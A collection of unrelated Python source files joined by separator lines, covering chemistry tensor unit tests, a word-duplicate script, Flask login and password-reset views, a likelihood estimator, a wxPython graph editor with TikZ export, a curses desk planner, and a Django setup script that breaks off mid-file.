        # both input and output in atomic units.
        self.c = Cluster.get_water_cluster(
            FILE,
            in_AA = False,
            out_AA = False,
            N_waters = 10)
    def test_beta_rotation(self):
        """reference beta is for a tip3p rotated 1.57 radians round z axis"""
        bxxz = -2.2760
        byyz = -14.409
        bzzz = -5.851
        #w = Generator().get_mol( [0,0,0] )
        v = np.zeros( (3,3,3))
        # These are the vectors when aligned in the x-z plane, with the xxz and
        # yyz components switched; rotating pi/2 about z should swap them back.
        v[0,0,2] = byyz
        v[1,1,2] = bxxz
        v[2,2,2] = bzzz
        vnew = Rotator.transform_3( v, np.pi/2, 0,0 )
        self.eq( vnew[0,0,2], bxxz )
        self.eq( vnew[1,1,2], byyz )
        self.eq( vnew[2,2,2], bzzz )
    def test_size(self):
        # Fresh cluster (same parameters as setUp's fixture).
        c = Cluster.get_water_cluster(
            FILE,
            in_AA = False,
            out_AA = False,
            N_waters = 10)
        # Read in distributed properties, transform to atomic sites from waters euler angles
        for wat in c:
            t1, t2, t3 = wat.get_euler()
            kwargs_dict = Template().get( *("TIP3P", "HF", "ANOPVDZ",
                True , "0.0" ))
            for at in wat:
                Property.add_prop_from_template( at, kwargs_dict )
                at.Property.transform_ut_properties( t1, t2 ,t3)
        # Read in the properties for the oxygen atom, the projected dipole vector should
        # be the same
        for wat in c:
            # Accumulate per-water charge, dipole, alpha and beta over its atoms.
            q = np.zeros( (1, ) )
            d = np.zeros( (3, ) )
            a = np.zeros( (3,3, ) )
            b = np.zeros( (3,3,3, ) )
            for at in wat:
                q += at.Property["charge"]
                # Shift each atomic dipole to the center of charge.
                d += at.Property["dipole"] + at.Property["charge"] * (at.r-wat.coc)
                a += Rotator.ut_2_square( at.Property["alpha"] )
                b += Rotator.ut_3_square( at.Property["beta"] )
            kwargs_dict = Template().get( *("TIP3P", "HF", "ANOPVDZ",
                False , "0.0" ))
            d_ref = kwargs_dict[('O1','dipole')]
            b_ref = Rotator.ut_3_square( kwargs_dict[('O1','beta')] )
            # Water should be net neutral...
            self.eq( q, 0.0 )
            # ...and the beta trace projected on the dipole direction should
            # match the reference oxygen values.
            self.eq( np.dot( np.einsum('iij->j',b), d)/np.linalg.norm(d),
                np.dot( np.einsum('iij->j',b_ref),d_ref)/np.linalg.norm(d_ref),
                decimal = 4)
    def test_tensor_to_ut(self):
        # Build a full 3x6 tensor whose symmetry-equivalent entries disagree,
        # then check tensor_to_ut averages each permutation group.
        t = np.zeros( (3, 6) )
        self.eq( t, np.zeros( ( 3, 6, )) )
        #xxx component
        t[0,0] = -3.0
        #yyy component
        t[1,3] = 0.25
        #zzz component
        t[2,5] = 5.0
        #xxy component
        t[0,1] = 3.5
        t[1,0] = 4.5
        #xxz component
        t[0,2] = 2.0
        t[2,0] = 3.0
        #xyy component
        t[0,3] = -2.0
        #xyz component
        t[0,4] = 1.0
        t[1,2] = 3.0
        t[2,1] = 8.0
        t[1,1] = 2.0
        #xzz component
        t[0,5] = 2.0
        t[2,2] = -1.0
        #yyz component
        t[1,4] = 3.5
        t[2,3] = 7.5
        #yzz component
        t[1,5] = -4.0
        t[2,4] = -6.0
        # AFTER TRANSFORMATION
        square = Rotator.tensor_to_ut( t )
        #xxx, one permutation, -3.0
        self.eq( square[0], -3.0 )
        #xxy, two permutations, 3.5 and 4.5 should be 4.0
        self.eq( square[1], 4.0 )
        #xxz, two permutations, 2.0 and 3.0 should be 2.5
        self.eq( square[2], 2.5 )
        #xyy, two permutations, -2.0 and 2.0 should be 0
        self.eq( square[3], 0.0 )
        #xyz, three permutations, 1.0 and 3.0 and 8.0 should be 4.0
        self.eq( square[4], 4.0 )
        #xzz, two permutations, 2.0 and -1.0 should be 0.5
        self.eq( square[5], 0.5 )
        #yyy, one permutation, 0.25
        self.eq( square[6], 0.25 )
        #yyz, two permutations, 3.5 and 7.5, should be 5.5
        self.eq( square[7], 5.5 )
        #yzz, two permutations, -4.0 and -6.0, should be -5.0
        self.eq( square[8], -5.0 )
        #zzz, one permutation, 5.0
        self.eq( square[9], 5.0 )
    def test_property_add(self):
        # Property addition is element-wise on shared keys.
        p1 = Property()
        p1["charge"] = 0.3
        p2 = Property()
        p2["charge"] = 0.7
        assert (p1 + p2)["charge"] == 1.0
    def test_property_sub(self):
        # Property subtraction is element-wise on shared keys.
        p1 = Property()
        p1["charge"] = 0.3
        p2 = Property()
        p2["charge"] = 0.7
        self.eq( (p2 - p1)["charge"] , 0.4, decimal = 7 )
    def eq(self, a, b, decimal = 7):
        # Shorthand for numpy's almost-equal assertion.
        np.testing.assert_almost_equal( a, b, decimal = decimal )
if __name__ == '__main__':
    # Run the test suite when this file is executed directly.
    unittest.main()
|
# Read whitespace-separated words from stdin and print, in sorted order,
# every word that occurs more than once (original spacing quirks preserved:
# a duplicate group ending exactly at the end of the list gets no trailing
# space, every other group does).
words = sorted(input().split())
current = ''
repeat_pending = False
output = ''
for idx, word in enumerate(words):
    if idx == 0:
        current = word
        continue
    if word == current:
        if idx == len(words) - 1:
            # Duplicate run closes at the very end: emit without a space.
            output += word
        else:
            repeat_pending = True
    else:
        # Run of `current` ended; emit it if it repeated.
        if repeat_pending:
            output += current + " "
        current = word
        repeat_pending = False
print(output)
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=C,R,W
import logging
from flask import flash, redirect, url_for, g, request, make_response
from flask_appbuilder import has_access
from flask_babel import lazy_gettext
from flask_mail import Mail, Message
from flask_login import login_user
from flask_appbuilder.views import expose, PublicFormView, ModelView
from flask_appbuilder.security.forms import ResetPasswordForm
from .forms import (
SolarBILoginForm_db,
SolarBIPasswordRecoverForm,
SolarBIPasswordRecoverFormWidget,
SolarBIPasswordResetFormWidget,
SolarBIPasswordResetForm,
SolarBIUserInfoEditForm,
SolarBIIUserInfoEditWidget,
SolarBIResetMyPasswordWidget,
)
from flask_appbuilder._compat import as_unicode
from flask_appbuilder.security.views import AuthDBView, UserInfoEditView, ResetMyPasswordView
log = logging.getLogger(__name__)
class SolarBIAuthDBView(AuthDBView):
    """DB-backed login view with SolarBI branding and remember-me support."""
    invalid_login_message = lazy_gettext("Email/Username or password incorrect. Please try again.")
    login_template = "appbuilder/general/security/solarbi_login_db.html"
    @expose("/login/", methods=["GET", "POST"])
    def login(self):
        # Already-authenticated users go straight to the index page.
        if g.user is not None and g.user.is_authenticated:
            return redirect(self.appbuilder.get_url_for_index)
        form = SolarBILoginForm_db()
        if form.validate_on_submit():
            user = self.appbuilder.sm.auth_user_db(
                form.username.data, form.password.data
            )
            if not user:
                # Same generic message for unknown user and wrong password.
                flash(as_unicode(self.invalid_login_message), "warning")
                return redirect(self.appbuilder.get_url_for_login)
            # Honor the form's "remember me" checkbox for the session cookie.
            remember = form.remember_me.data
            login_user(user, remember=remember)
            return redirect(self.appbuilder.get_url_for_index)
        # GET, or POST with validation errors: render the login form.
        return self.render_template(
            self.login_template, title=self.title, form=form, appbuilder=self.appbuilder
        )
class SolarBIPasswordRecoverView(PublicFormView):
    """
    This is the view for recovering password
    """
    route_base = '/password-recover'
    email_template = 'appbuilder/general/security/password_recover_mail.html'
    """ The template used to generate the email sent to the user """
    email_subject = lazy_gettext('SolarBI - Reset Your Password')
    """ The email subject sent to the user """
    message = lazy_gettext('Password reset link sent to your email')
    """ The message shown on a successful registration """
    error_message = lazy_gettext('This email is not registered or confirmed yet.')
    """ The message shown on an unsuccessful registration """
    form = SolarBIPasswordRecoverForm
    edit_widget = SolarBIPasswordRecoverFormWidget
    form_template = 'appbuilder/general/security/recover_password_form_template.html'
    def send_email(self, email, hash_val):
        """
        Method for sending the registration Email to the user
        """
        mail = Mail(self.appbuilder.get_app)
        msg = Message()
        # Tuple form: (display name, address).
        msg.sender = 'SolarBI', 'chenyang.wang@zawee.work'
        msg.subject = self.email_subject
        # Absolute link back to this view's reset endpoint with the hash.
        url = url_for('.reset', _external=True, reset_hash=hash_val)
        msg.html = self.render_template(self.email_template,
                                        url=url)
        msg.recipients = [email]
        try:
            mail.send(msg)
        except Exception as e:
            log.error('Send email exception: {0}'.format(str(e)))
            return False
        return True
    def add_password_reset(self, email):
        # Create a reset request; None means the email is unknown/unconfirmed.
        reset_hash = self.appbuilder.sm.add_reset_request(email)
        if reset_hash is not None:
            flash(as_unicode(self.message), 'info')
            # NOTE(review): send_email's False return (send failure) is ignored
            # here, so the user still sees the success message.
            self.send_email(email, reset_hash)
            return redirect(self.appbuilder.get_url_for_index)
        else:
            flash(as_unicode(self.error_message), 'danger')
            return redirect(self.appbuilder.get_url_for_index)
    @expose('/reset/<string:reset_hash>')
    def reset(self, reset_hash):
        """ This is end point to verify the reset password hash from user
        """
        # NOTE(review): implicitly returns None when reset_hash is None.
        if reset_hash is not None:
            return redirect(self.appbuilder.sm.get_url_for_reset(token=reset_hash))
    def form_post(self, form):
        # PublicFormView hook: called on a valid POST of the recover form.
        return self.add_password_reset(email=form.email.data)
class SolarBIResetPasswordView(PublicFormView):
    """Public view where a user sets a new password via an emailed token."""
    route_base = '/reset'
    form = SolarBIPasswordResetForm
    form_template = 'appbuilder/general/security/reset_password_form_template.html'
    edit_widget = SolarBIPasswordResetFormWidget
    redirect_url = '/'
    message = lazy_gettext('Password has been reset.')
    error_message = lazy_gettext('Sorry, the link has expired.')
    @expose('/form', methods=['GET'])
    def this_form_get(self):
        # Show the reset form only if the ?token= maps to a known user.
        self._init_vars()
        form = self.form.refresh()
        token = request.args.get('token')
        user = self.appbuilder.sm.find_user_by_token(token)
        if user is not None:
            self.form_get(form)
            widgets = self._get_edit_widget(form=form)
            self.update_redirect()
            return self.render_template(self.form_template,
                                        title=self.form_title,
                                        widgets=widgets,
                                        appbuilder=self.appbuilder)
        # Unknown or expired token.
        flash(as_unicode(self.error_message), 'danger')
        return redirect(self.appbuilder.get_url_for_index)
    @expose('/form', methods=['POST'])
    def this_form_post(self):
        self._init_vars()
        form = self.form.refresh()
        if form.validate_on_submit():
            token = request.args.get('token')
            response = self.form_post(form, token=token)
            if not response:
                # form_post returned None: token invalid — re-render with error.
                return self.this_form_get()
            return redirect(response)
        else:
            widgets = self._get_edit_widget(form=form)
            return self.render_template(
                self.form_template,
                title=self.form_title,
                widgets=widgets,
                appbuilder=self.appbuilder,
            )
    def form_post(self, form, **kwargs):
        # Returns the redirect URL on success, None when the token is invalid.
        token = kwargs['token']
        user = self.appbuilder.sm.find_user_by_token(token)
        if user is not None:
            flash(as_unicode(self.message), 'info')
            password = form.password.data
            self.appbuilder.sm.reset_password(user.id, password)
            # Single-use token: mark it consumed.
            self.appbuilder.sm.set_token_used(token)
            return self.appbuilder.get_url_for_index
        return None
class SolarBIUserInfoEditView(UserInfoEditView):
    """Profile-editing view with SolarBI templates and widgets."""
    form_title = 'My Profile - SolarBI'
    form = SolarBIUserInfoEditForm
    form_template = 'appbuilder/general/security/edit_user_info.html'
    edit_widget = SolarBIIUserInfoEditWidget
    @expose("/form", methods=["POST"])
    @has_access
    def this_form_post(self):
        self._init_vars()
        form = self.form.refresh()
        if form.validate_on_submit():
            response = self.form_post(form)
            if not response:
                # No explicit response from the hook: reload the profile form.
                return redirect("/solarbiuserinfoeditview/form")
            return response
        else:
            # Validation failed: re-render with field errors.
            widgets = self._get_edit_widget(form=form)
            return self.render_template(
                self.form_template,
                title=self.form_title,
                widgets=widgets,
                appbuilder=self.appbuilder,
            )
class SolarBIResetMyPasswordView(ResetMyPasswordView):
    """Self-service password change, re-skinned with SolarBI template/widget."""
    form_template = 'appbuilder/general/security/reset_my_password.html'
    edit_widget = SolarBIResetMyPasswordWidget
# class SolarBIUserDBModelView(UserDBModelView):
# # pass
# # route_base = '/solar'
# show_template = 'appbuilder/general/security/my_profile.html'
# show_widget = SolarBIShowWidget
|
import numpy as np
from scipy.special import logsumexp
from optimization.loss import binary_loss_function
## Code adopted from
# https://github.com/riannevdberg/sylvester-flows/blob/master/utils/log_likelihood.py
#calculates the true marginal likelihood by IS
def calculate_likelihood(X, model, args, S=5000, MB=500):
    """Estimate the negative marginal log-likelihood of X by importance sampling.

    S importance samples per data point are evaluated in R minibatches of at
    most MB samples each; per-point likelihoods are combined with a
    log-mean-exp. Returns the mean NLL over all points.
    """
    # set auxiliary variables for number of training and test sets
    N_test = X.size(0)
    X = X.view(-1, *args.input_size)
    likelihood_test = []
    # Split the S samples into R minibatches of size MB (S is truncated to a
    # multiple of MB when S > MB).
    if S <= MB:
        R = 1
    else:
        R = S // MB
        S = MB
    for j in range(N_test):
        if j % 100 == 0:
            print('Progress: {:.2f}%'.format(j / (1. * N_test) * 100))
        x_single = X[j].unsqueeze(0)
        a = []
        for r in range(0, R):
            # Repeat the single point S times so the model evaluates all
            # importance samples in one batch.
            x = x_single.expand(S, *x_single.size()[1:]).contiguous()
            x_mean, z_mu, z_var, ldj, z0, zk = model(x)
            log_vamp_zk = model.log_vamp_zk(zk) if args.vampprior else None
            # Per-sample negative ELBO terms (summ=False keeps them unsummed).
            a_tmp, _ , _ = binary_loss_function(x_mean, x, z_mu, z_var, z0, zk, ldj, args.z_size,
                                                args.cuda, summ=False, log_vamp_zk=log_vamp_zk)
            a.append(-a_tmp.cpu().data.numpy())
        # Flatten all R*S log-weights into one column.
        a = np.asarray(a)
        a = np.reshape(a, (a.shape[0] * a.shape[1], 1))
        # log-mean-exp: logsumexp(weights) - log(N) gives the IS estimate.
        likelihood_x = logsumexp(a)
        likelihood_test.append(likelihood_x - np.log(len(a)))
    likelihood_test = np.array(likelihood_test)
    nll = -np.mean(likelihood_test)
    return nll
|
#!/usr/bin/python
#contains most of the code for the graph drawing panel
#some display information (whether a vertex is selected, etc.) is contained
#in graph.py
#UI main loop and parent window are started in main.py
import sys
import wx
import math
from cascades import *
from math import sqrt
def control_point(edge, graph):
    """Return the quadratic-Bezier control point for drawing *edge*.

    The control point sits on the perpendicular bisector of the edge, on the
    side with fewer other vertices, and moves farther out for parallel edges
    (scaled by edge.index - 1).
    """
    midpoint = Point()
    edge_v = Point()
    edge_perp = Point()
    # Edge midpoint. NOTE(review): under Python 2 these divisions floor for
    # int coordinates — presumably intentional for pixel coords; verify.
    midpoint.x = (edge.v1.x + edge.v2.x)/2
    midpoint.y = (edge.v1.y + edge.v2.y)/2
    # Edge direction vector and its perpendicular.
    edge_v.x, edge_v.y = edge.v1.x - edge.v2.x, edge.v1.y - edge.v2.y
    edge_perp.x, edge_perp.y = -1 * float(edge_v.y), float(edge_v.x)
    #count the number of vertices on either side of the edge
    pos = 0
    neg = 0
    for vertex in filter(lambda v: not edge.has(v), graph.vertices):
        vec = Point()
        vec.x, vec.y = vertex.x - midpoint.x, vertex.y - midpoint.y
        mat = [[edge_v.x, edge_perp.x],[edge_v.y, edge_perp.y]]
        det = mat[0][0] * mat[1][1] - mat[0][1] * mat[1][0]
        #product instead of quotient b/c we only care about sign
        param = (vec.y * mat[0][0] - vec.x * mat[1][0]) * det
        if param > 0:
            pos += 1
        elif param < 0:
            neg += 1
    # Normalize the perpendicular (guard against zero-length edges).
    norm = sqrt(edge_perp.x**2 + edge_perp.y**2)
    if norm != 0:
        edge_perp.x /= norm
        edge_perp.y /= norm
    #get coordinates for a quadratic bezier curve between the edge.
    #the control point is farther from the edge if there are more edges.
    #it's placed on the side of the edge that has fewer vertices
    sign = 30
    if pos > neg:
        sign *= -1
    c = Point()
    c.x = midpoint.x + sign * edge_perp.x * (edge.index - 1)
    c.y = midpoint.y + sign * edge_perp.y * (edge.index - 1)
    return c
# Map a point from window coordinates into TikZ coordinates.
def tikz_transform(point, origin, scale):
    """Return (x, y) of *point* in TikZ space relative to *origin*.

    The y-axis is inverted because +y points down in window coordinates.
    """
    tikz_x = (point.x - origin.x)/scale
    tikz_y = (origin.y - point.y)/scale
    return (tikz_x, tikz_y)
def get_tikz_code(graph):
    """Serialize *graph* (vertices + curved edges) into a TikZ picture string."""
    scale = float(50) #pixels to TikZ coordinates
    origin = Point()
    #the following isn't super efficient, but whatever
    # Origin = top-left-most extent of vertices AND control points, so every
    # emitted coordinate is non-negative in x and non-positive offsets in y.
    # NOTE(review): `map(...) + map(...)` only works on Python 2 where map
    # returns a list; under Python 3 this raises TypeError.
    origin.x = min(map(lambda v: v.x, graph.vertices) +
                   map(lambda e: control_point(e, graph).x, graph.edges))
    origin.y = max(map(lambda v: v.y, graph.vertices) +
                   map(lambda e: control_point(e, graph).y, graph.edges))
    output = "\\begin{tikzpicture}\n"
    for vertex in graph.vertices:
        output += "\\filldraw (%f, %f) circle (3pt);\n"%tikz_transform(vertex, origin, scale)
    for edge in graph.edges:
        # Each edge is a quadratic Bezier through its computed control point.
        ctrl = control_point(edge, graph)
        tikz_tup = (tikz_transform(edge.v1, origin, scale) +
                    tikz_transform(ctrl, origin, scale) +
                    tikz_transform(edge.v2, origin, scale))
        # NOTE(review): "\draw" relies on "\d" being passed through as-is;
        # a raw string or "\\draw" would be safer.
        output += "\draw (%f, %f) .. controls (%f, %f) .. (%f, %f);\n"%tikz_tup
    output += "\\end{tikzpicture}\n"
    return output
#the graph-drawing panel
class DrawPanel(wx.Panel):
def __init__(self, parent, info_evt):
self.graph = Graph()
self.divisor = Divisor(self.graph)
wx.Panel.__init__(self, parent)
self.newd = wx.TextCtrl(self,-1,"",(0,0), (65,20),wx.TE_PROCESS_ENTER)
self.newd.Hide()
self.badrtext = wx.StaticText(self, label = "Please enter a number between 0 and 1", pos = (70, 0))
self.badrtext.Hide()
#treesel = False
self.Bind(wx.EVT_PAINT, self.on_paint)
self.Bind(wx.EVT_SIZE, self.on_size)
self.Bind(wx.EVT_LEFT_DOWN, self.on_click)
self.Bind(wx.EVT_MOTION, self.mouse_move)
self.Bind(wx.EVT_TEXT_ENTER, self.on_enter)
#vertex colors
self.black = wx.Brush((0,0,0))
self.red = wx.Brush((255,0,0))
self.gray = wx.Brush((150, 150, 150))
self.pink = wx.Brush((255, 100, 100))
#font styles
self.fontsizes = [20,14,10,10]
self.x_displace = [5,3,2,0]
self.y_displace = [1,4,5,5]
self.fontcolors = ["white","white","white","white"]
#function to call whenever an edge (or vertex?) is added to the graph
self.info_evt = info_evt
#which vertex is selected (red), or None if none is
self.selection = None
#string for updating divisor values
self.tempstring = ""
def on_size(self, event):
event.Skip()
self.Refresh()
def on_paint(self, event):
w,h = self.GetClientSize()
dc = wx.BufferedPaintDC(self)
dc.SetBackground(wx.Brush("white"))
dc.Clear()
gc = wx.GraphicsContext.Create(dc)
gc.SetPen(wx.Pen("black",1))
#draw edges
for edge in self.graph.edges:
ctrl = control_point(edge, self.graph)
path = gc.CreatePath()
path.MoveToPoint(edge.v1.x, edge.v1.y)
path.AddQuadCurveToPoint(ctrl.x, ctrl.y, edge.v2.x, edge.v2.y)
gc.DrawPath(path,1)
#draw vertices
for vertex in self.graph.vertices:
if vertex.selected and not vertex.hover:
gc.SetBrush(self.red)
elif vertex.selected:
gc.SetBrush(self.pink)
elif vertex.hover:
gc.SetBrush(self.gray)
else:
gc.SetBrush(self.black)
gc.DrawEllipse(vertex.x - Vertex.radius,
vertex.y - Vertex.radius,
2 * Vertex.radius,
2 * Vertex.radius)
n = self.divisor.get(vertex)
if not ((n - int(n)) == 0):
n = round(n,1)
m = len(str(n))
if m > 3:
m = 4
font = wx.Font(self.fontsizes[m-1],wx.FONTFAMILY_SWISS,1,wx.FONTWEIGHT_BOLD)
gc.SetFont(font,self.fontcolors[m-1])
gc.DrawText(str(n), vertex.x - Vertex.radius + self.x_displace[m-1],
vertex.y - Vertex.radius + self.y_displace[m-1])
#select an island in order to add a percentage of adoption
def on_click(self, event):
    """Handle a left click.

    Clicking an existing vertex either connects it to the current selection
    (adding an edge) or toggles the selection off; clicking empty space adds
    a new vertex there (shift-click also connects it to the selection) and
    selects it.  The original duplicated the deselection sequence in two
    branches; it is merged here.
    """
    x, y = event.GetX(), event.GetY()
    for vertex in self.graph.vertices:
        if vertex.over(x, y):
            if self.selection:
                if self.selection != vertex:
                    #TODO: check that we didn't deselect
                    self.graph.add_edge(self.selection, vertex)
                # clear the current selection (common to both cases above)
                self.selection.selected = False
                self.selection = None
                self.newd.Hide()
                self.badrtext.Hide()
                self.update_info()
            else:
                self.selection = vertex
                vertex.selected = True
                self.newd.Show()
            self.Refresh()
            return
    # no vertex was hit: create one at the click position
    self.graph.add_vertex(x, y)
    last = self.graph.get_last()  # the vertex we just added
    self.divisor.extend()
    if event.ShiftDown() and self.selection:
        self.graph.add_edge(self.selection, last)
        self.update_info()
    self.graph.deselect_all()
    self.selection = last
    self.selection.selected = True
    self.newd.Show()
    self.update_info()
    self.Refresh()
def update_info(self):
    """Notify the owner via the callback registered at construction time."""
    self.info_evt()
def mouse_move(self, event):
    """Refresh hover highlighting as the pointer moves across the panel."""
    px, py = event.GetX(), event.GetY()
    for vertex in self.graph.vertices:
        vertex.hover = bool(vertex.over(px, py))
    self.Refresh()
#enter a percentage value for a particular island
def on_enter(self, event):
self.badrtext.Hide()
try:
n = int(self.newd.GetLineText(0))
except:
try:
n = float(self.newd.GetLineText(0))
except:
print "Not a number"
self.newd.Clear()
return
if not (0 <= n <= 1):
self.badrange()
return
if self.selection:
self.divisor.set(self.selection,n)
self.divisor.generation = 0
self.newd.Hide()
self.update_info()
self.Refresh()
def badrange(self):
    """Show the out-of-range warning and wipe the entry box."""
    self.badrtext.Show()
    self.newd.Clear()
def clear(self):
    """Reset the canvas to an empty graph.

    Empties the graph, re-runs the divisor's initializer against the now
    empty graph, hides the range warning, drops the selection, then
    notifies the owner and repaints.  The order matters: the divisor is
    rebuilt from the graph *after* the graph is cleared.
    """
    self.graph.clear()
    # re-initialize the existing divisor object in place (rather than
    # rebinding) so any external references to it stay valid
    self.divisor.__init__(self.graph)
    self.badrtext.Hide()
    self.selection = None
    self.update_info()
    self.Refresh()
|
#!/usr/bin/env python3
"""
Random seating planner - 2020, Nien Huei Chang
dskrnd.py - main program
"""
import json
import curses
import random
DESK_POOL = 50
DATABASE_FILE_NAME = "dskrnd.json"
database = []
screen = curses.initscr()
def read_database_file():
    """Load the database list from the local json file.

    Returns True on success, False when the file is missing, unreadable,
    or contains invalid json (the database is left untouched then).
    """
    global database
    try:
        with open(DATABASE_FILE_NAME) as database_file:
            database = json.load(database_file)
    except (IOError, json.decoder.JSONDecodeError):
        return False
    return True
def write_database_file():
    """Persist the database list to the local json file; True on success."""
    try:
        with open(DATABASE_FILE_NAME, "w") as database_file:
            json.dump(database, database_file, indent=4)
    except IOError:
        return False
    return True
def get_assigned_desk_numbers():
    """Get a list of all assigned desk numbers from the database list."""
    return [record["desk_number"] for record in database]
def get_assigned_user_names():
    """Get a list of all user names from the database list."""
    return [record["user_name"] for record in database]
def get_user_name(desk_number):
    """Get the user name assigned to a desk number, or "" if unassigned."""
    matches = (r["user_name"] for r in database if r["desk_number"] == desk_number)
    return next(matches, "")
def get_desk_number(user_name):
    """Get the desk number assigned to a user name, or 0 if not found."""
    matches = (r["desk_number"] for r in database if r["user_name"] == user_name)
    return next(matches, 0)
def add_desk_assignment(desk_number, user_name):
    """Append a new desk/user assignment record to the database list."""
    database.append({
        "user_name": user_name,
        "desk_number": desk_number,
    })
def clear_desk_assignment(desk_number):
    """Delete the record(s) of a given desk number.

    Bug fix: the original deleted from ``database`` while iterating over
    it, which skips the element following each removal.  Rebuilding the
    list in place (slice assignment keeps the shared global list object)
    removes every matching record safely.
    """
    database[:] = [record for record in database
                   if record["desk_number"] != desk_number]
def wait_for_key(message=""):
    """Display *message* (if any), then block until the user presses a key.

    When a message is given the screen is redrawn first; the standard
    "Press any key to continue..." prompt is always shown on the
    second-to-last line.
    """
    if message:
        screen.clear()
        screen.border()
        screen.addstr(2, 2, message)
    prompt_row = screen.getmaxyx()[0] - 2
    screen.addstr(prompt_row, 2, "Press any key to continue...")
    screen.getkey()
def get_user_input(message):
    """Show *message* and return the line the user types, decoded as UTF-8."""
    screen.clear()
    screen.border()
    screen.addstr(2, 2, message)
    curses.echo()           # echo characters while the user types
    curses.curs_set(True)   # and show the cursor
    typed = screen.getstr().decode("utf-8")
    curses.curs_set(False)  # restore: hide cursor
    curses.noecho()         # restore: no echo
    return typed
def assign_desk():
    """Ask for a user name and assign it to a randomly chosen free desk.

    Re-prompts on invalid or duplicate names; an empty name cancels.
    """
    if len(get_assigned_desk_numbers()) >= DESK_POOL:
        wait_for_key("No free desk available.")
        return
    while True:
        user_name = get_user_input("Please enter user name (2 - 17 characters, empty to cancel): ")
        if not user_name:
            return
        if len(user_name) < 2:
            wait_for_key("User name too short.")
        elif len(user_name) > 17:
            wait_for_key("User name too long.")
        elif user_name in get_assigned_user_names():
            wait_for_key(f"User '{user_name}' has been found in database assigned to desk number {get_desk_number(user_name)}.")
        else:
            # pick uniformly among desks not yet assigned
            all_desks = set(range(1, DESK_POOL + 1))
            assigned_desks = set(get_assigned_desk_numbers())
            free_desks = list(all_desks - assigned_desks)
            desk_number = random.choice(free_desks)
            add_desk_assignment(desk_number, user_name)
            wait_for_key(f"User '{user_name}' has been assigned to desk number {desk_number}.")
            return
def clear_desk():
    """Ask for a desk number and remove its assignment record.

    Re-prompts on invalid or unassigned desk numbers; empty input cancels.
    Bug fix: the validation message read "... in range 1 - N range." with a
    doubled word; it is also deduplicated into one variable.
    """
    if len(get_assigned_desk_numbers()) == 0:
        wait_for_key("No desks assigned yet.")
        return
    # same failure text for non-numeric and out-of-range input
    bad_number_message = f"Desk number must be a number in the range 1 - {DESK_POOL}."
    while True:
        desk_number = get_user_input(f"Please enter desk number (1 - {DESK_POOL}, empty to cancel): ")
        if len(desk_number) == 0:
            break
        if not desk_number.isdigit():
            wait_for_key(bad_number_message)
            continue
        desk_number = int(desk_number)
        if not (1 <= desk_number <= DESK_POOL):
            wait_for_key(bad_number_message)
            continue
        if desk_number not in get_assigned_desk_numbers():
            wait_for_key(f"Desk number {desk_number} is not assigned to any user.")
            continue
        clear_desk_assignment(desk_number)
        wait_for_key(f"Desk {desk_number} has been cleared.")
        break
def show_desks():
    """Display all desk / user assignments sorted by desk number.

    Entries flow down a column and wrap into a new 25-character-wide
    column when the bottom of the window is reached.
    """
    screen.clear()
    screen.border()
    row, col = 2, 2
    for desk_number in range(1, DESK_POOL + 1):
        if row == screen.getmaxyx()[0] - 4:
            row = 2
            col += 25
        screen.addstr(row, col, f"{desk_number:2} - {get_user_name(desk_number)}")
        row += 1
    wait_for_key()
def show_users():
    """Display all desk / user assignments sorted by user name.

    Same column-wrapping layout as show_desks().
    """
    screen.clear()
    screen.border()
    row, col = 2, 2
    for user_name in sorted(get_assigned_user_names()):
        if row == screen.getmaxyx()[0] - 4:
            row = 2
            col += 25
        screen.addstr(row, col, f"{user_name:17} - {get_desk_number(user_name):2}")
        row += 1
    wait_for_key()
def main(_):
    """Display the main menu and dispatch on the user's key presses.

    Loads the database on entry and saves it on exit.  Refuses to draw the
    menu while the terminal is smaller than 80x24.  Fixes: the resize
    message carried a spurious ``f`` prefix with no placeholders; the
    if/elif chain is replaced by a dispatch dict.
    """
    read_database_file()
    curses.noecho()         # do not show user typed characters on the screen
    curses.curs_set(False)  # hide cursor
    # menu key -> action ("0" exits the loop below)
    actions = {
        "1": assign_desk,
        "2": clear_desk,
        "3": show_desks,
        "4": show_users,
    }
    while True:
        if screen.getmaxyx()[0] < 24 or screen.getmaxyx()[1] < 80:
            screen.clear()
            screen.addstr(0, 0, "Terminal window needs to be at least 80x24, please adjust the window size...")
            screen.getkey()  # wait for 'KEY_RESIZE' or any keycode sent on resize
            continue
        screen.clear()
        screen.border()
        screen.addstr(2, 2, "Main menu")
        screen.addstr(4, 2, "1. Assign desk")
        screen.addstr(5, 2, "2. Clear desk")
        screen.addstr(6, 2, "3. Show desks")
        screen.addstr(7, 2, "4. Show users")
        screen.addstr(9, 2, "0. Save data and exit program")
        key = screen.getkey()
        if key == "0":
            break
        if key in actions:
            actions[key]()
    write_database_file()
if __name__ == "__main__":
    curses.wrapper(main)
|
import os
import sys
from django.utils.crypto import get_random_string
def get_settings_file_name():
    """Return the path of the generated project's settings.py."""
    return get_project_file_name('settings.py')
def get_project_file_name(file_name):
    """Join *file_name* onto the project directory (module-global project_name)."""
    return os.path.join(project_name, file_name)
def generate_secret_key():
    """Produce a 50-character Django SECRET_KEY from the conventional charset."""
    allowed = 'abcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*(-_=+)'
    return get_random_string(50, allowed)
def update_settings_file():
    """Fill in the placeholders in the generated project's settings.py.

    Bug fix: the original loop assigned from the undefined name
    ``settings_file`` instead of accumulating replacements on
    ``file_data``, so it raised NameError and would have kept only the
    last substitution.  Delegating to update_file() puts the
    read-replace-write logic in one place.
    """
    update_file(get_settings_file_name(), (
        ('<secret_key>', generate_secret_key()),
        ('<project_name>', project_name),
        ('<app_name>', app_name),
        ('<db_name>', db_name),
        ('<db_user>', db_user),
        ('<db_password>', db_password),
    ))
def update_file(file_name, replace_list):
    """Rewrite *file_name* in place, applying every (placeholder, value) pair."""
    with open(file_name) as source:
        contents = source.read()
    for placeholder, value in replace_list:
        contents = contents.replace(placeholder, value)
    with open(file_name, 'w') as target:
        target.write(contents)
if __name__ == '__main__':
    # CLI usage: script.py <app_name> <db_password>
    # Instantiates a Django project skeleton by renaming the 'template'
    # directories to the app name and substituting placeholders in the
